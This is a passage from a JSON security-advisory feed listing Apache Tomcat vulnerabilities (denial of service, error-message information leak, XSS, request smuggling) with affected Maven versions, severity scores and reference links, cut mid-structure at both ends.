"type": "WEB", "url": "https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a@%3Cusers.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a%40%3Cusers.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00002.html" }, { "type": "WEB", "url": "http://support.blackberry.com/kb/articleDetail?articleNumber=000062739" } ], "database_specific": { "cwe_ids": [ "CWE-269" ], "github_reviewed": true, "github_reviewed_at": "2020-06-15T16:10:05Z", "nvd_published_at": "2020-02-24T22:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cx6h-86xw-9x34", "published": "2023-07-06T21:14:59Z", "modified": "2024-04-24T19:31:03.102779Z", "aliases": [ "BIT-tomcat-2023-28709", "CVE-2023-28709" ], "summary": "Apache Tomcat - Fix for CVE-2023-24998 was incomplete", "details": "The fix for CVE-2023-24998 was incomplete. 
If non-default HTTP connector settings were used such that the maxParameterCount could be reached using query string parameters and a request was submitted that supplied exactly maxParameterCount parameters in the query string, the limit for uploaded request parts could be bypassed with the potential for a denial of service to occur.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M2" }, { "fixed": "11.0.0-M5" } ] } ], "versions": [ "11.0.0-M3", "11.0.0-M4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-cx6h-86xw-9x34/GHSA-cx6h-86xw-9x34.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.5" }, { "fixed": "10.1.8" } ] } ], "versions": [ "10.1.5", "10.1.6", "10.1.7" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-cx6h-86xw-9x34/GHSA-cx6h-86xw-9x34.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.71" }, { "fixed": "9.0.74" } ] } ], "versions": [ "9.0.71", "9.0.72", "9.0.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-cx6h-86xw-9x34/GHSA-cx6h-86xw-9x34.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.85" 
}, { "fixed": "8.5.88" } ] } ], "versions": [ "8.5.85", "8.5.86", "8.5.87" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-cx6h-86xw-9x34/GHSA-cx6h-86xw-9x34.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28709" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/5badf94e79e5de206fc0ef3054fd536b1bb787cd" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ba848da71c523d94950d3c53c19ea155189df9dc" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/d53d8e7f77042cc32a3b98f589496a1ef5088e38" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/fbd81421629afe8b8a3922d59020cde81caea861" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/7wvxonzwb7k9hx9jt3q33cmy7j97jo3j" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-37" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230616-0004" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5521" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/05/22/1" } ], "database_specific": { "cwe_ids": [ "CWE-193" ], "github_reviewed": true, "github_reviewed_at": "2023-07-06T23:34:50Z", "nvd_published_at": "2023-05-22T11:15:09Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f4qf-m5gf-8jm8", "published": "2024-01-19T12:30:18Z", "modified": "2025-11-03T23:02:07.816346Z", "aliases": [ 
"BIT-tomcat-2024-21733", "CVE-2024-21733" ], "summary": "Apache Tomcat vulnerable to Generation of Error Message Containing Sensitive Information", "details": "Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.\n\nUsers are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M11" }, { "fixed": "9.0.44" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.7" }, { "fixed": "8.5.64" } ] } ], "versions": [ "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.40", 
"8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.60", "8.5.61", "8.5.63", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21733" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/86ccc43940861703c2be96a5f35384407522125a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ce4b154e7b48f66bd98858626347747cd2514311" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240216-0005" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/176951/Apache-Tomcat-8.5.63-9.0.43-HTTP-Response-Smuggling.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/01/19/2" } ], "database_specific": { "cwe_ids": [ "CWE-209" ], "github_reviewed": true, "github_reviewed_at": "2024-01-29T22:30:43Z", "nvd_published_at": "2024-01-19T11:15:08Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f98p-9pp6-7q6c", "published": "2022-05-01T23:45:13Z", "modified": "2025-04-09T16:44:52Z", "aliases": [ "CVE-2008-1947" ], "summary": "Apache Tomcat Cross-site scripting (XSS) vulnerability", "details": "Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 
through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to `host-manager/html/add`.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "5.5.9" }, { "fixed": "5.5.27" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 5.5.26", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-f98p-9pp6-7q6c/GHSA-f98p-9pp6-7q6c.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.0.18" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 6.0.16", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-f98p-9pp6-7q6c/GHSA-f98p-9pp6-7q6c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "5.5.9" }, { "fixed": "5.5.27" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 5.5.26", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-f98p-9pp6-7q6c/GHSA-f98p-9pp6-7q6c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.0.18" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 6.0.16", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-f98p-9pp6-7q6c/GHSA-f98p-9pp6-7q6c.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2008-1947" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ab6a6c41ac972c845717c9d639f0335865afab4d" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/78ad0fcbe29c824f1f2e45a4e2716247b033250a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/49c71fc59c1b8f8da77aea9eb53e61db168aebab" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/5f00d434c8dc11bd49ce0b4b56fe889839056030" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3aacc40356defc3f248aa504b1e48e819dd0471a0a83349080c6bcbf%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3aacc40356defc3f248aa504b1e48e819dd0471a0a83349080c6bcbf@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r584a714f141eff7b1c358d4679288177bd4ca4558e9999d15867d4b5%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r584a714f141eff7b1c358d4679288177bd4ca4558e9999d15867d4b5@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apple.com/archives/security-announce/2008/Oct/msg00001.html" }, { "type": "WEB", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11534" }, { "type": "WEB", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6009" }, { "type": "WEB", "url": "https://web.archive.org/web/20200514224656/http://www.securityfocus.com/archive/1/507985/100/0/threaded" }, { "type": "WEB", "url": "https://web.archive.org/web/20201208011750/http://www.securityfocus.com/archive/1/492958/100/0/threaded" }, { "type": "WEB", "url": 
"https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00712.html" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00859.html" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00889.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8dcaf7c3894d66cb717646ea1504ea6e300021c85bb4e677dc16b1aa@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8dcaf7c3894d66cb717646ea1504ea6e300021c85bb4e677dc16b1aa%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e%40%3Cdev.tomcat.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/42816" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=446393" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2008-1947" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2008:1007" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2008:0864" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2008:0862" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2008:0648" }, { "type": "WEB", "url": "http://lists.apple.com/archives/security-announce/2008/Oct/msg00001.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2008-07/msg00001.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=123376588623823\u0026w=2" }, { "type": "WEB", "url": 
"http://marc.info/?l=bugtraq\u0026m=139344343412337\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=tomcat-user\u0026m=121244319501278\u0026w=2" }, { "type": "WEB", "url": "http://support.apple.com/kb/HT3216" }, { "type": "WEB", "url": "http://support.avaya.com/elmodocs2/security/ASA-2008-401.htm" }, { "type": "WEB", "url": "http://tomcat.apache.org/security-5.html" }, { "type": "WEB", "url": "http://tomcat.apache.org/security-6.html" }, { "type": "WEB", "url": "http://www.debian.org/security/2008/dsa-1593" }, { "type": "WEB", "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2008:188" }, { "type": "WEB", "url": "http://www.redhat.com/support/errata/RHSA-2008-0648.html" }, { "type": "WEB", "url": "http://www.redhat.com/support/errata/RHSA-2008-0862.html" }, { "type": "WEB", "url": "http://www.redhat.com/support/errata/RHSA-2008-0864.html" }, { "type": "WEB", "url": "http://www.vmware.com/security/advisories/VMSA-2009-0002.html" }, { "type": "WEB", "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2024-01-08T22:33:18Z", "nvd_published_at": "2008-06-04T19:32:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fccv-jmmp-qg76", "published": "2023-11-28T18:30:23Z", "modified": "2025-08-08T19:09:25.636121Z", "aliases": [ "BIT-tomcat-2023-46589", "CVE-2023-46589" ], "related": [ "CGA-3336-vxcr-qh26", "CGA-x5p2-8fvm-5gv3" ], "summary": "Apache Tomcat Improper Input Validation vulnerability", "details": "Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82, and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. 
A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy. Older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M11" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.16" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.83" } ] } ], "versions": [ "9.0.0.M1", 
"9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.96" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", 
"8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M11" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.16" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.83" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", 
"9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82" ], "database_specific": { "source": 